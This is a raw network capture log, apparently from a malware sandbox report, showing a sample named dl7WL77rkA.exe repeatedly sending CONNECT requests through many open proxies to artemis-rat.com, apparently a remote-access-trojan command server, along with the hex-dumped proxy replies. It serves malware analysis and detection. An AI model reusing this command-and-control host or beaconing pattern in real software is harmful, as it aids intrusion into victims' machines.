                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.593265057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.889642954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.201982021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.405291080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1446192.168.2.5538763.212.148.19931283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.411370039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.630837917 CET116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:44 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1447192.168.2.553958104.20.205.191803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.414470911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.569150925 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:44 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1448192.168.2.553976172.67.182.77803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.418654919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.574489117 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:44 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1449192.168.2.552521209.222.97.30158053876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.419058084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.405220032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.405416965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:56.499010086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1450192.168.2.553973104.25.244.70803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.419070959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.575516939 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:44 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1451192.168.2.55384147.106.112.20780813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.422962904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.768527985 CET767INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: Beaver
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 635
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1452192.168.2.553992104.22.1.113803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.423660040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.579629898 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:44 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1453192.168.2.553995104.27.8.161803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.425493002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.581568956 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:44 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1454192.168.2.55384936.92.81.18141453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.438836098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.201951027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.202653885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.202137947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.202111006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:56.202127934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:00.202330112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1455192.168.2.553847111.90.150.10910803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.441787004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1456192.168.2.55246743.255.113.232843876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.449866056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.201950073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.999383926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.592911959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.701945066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.905141115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.092612982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:03.201911926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1457192.168.2.55392838.162.20.13831283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.544246912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.974198103 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1458192.168.2.553871114.156.77.10780803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.544702053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
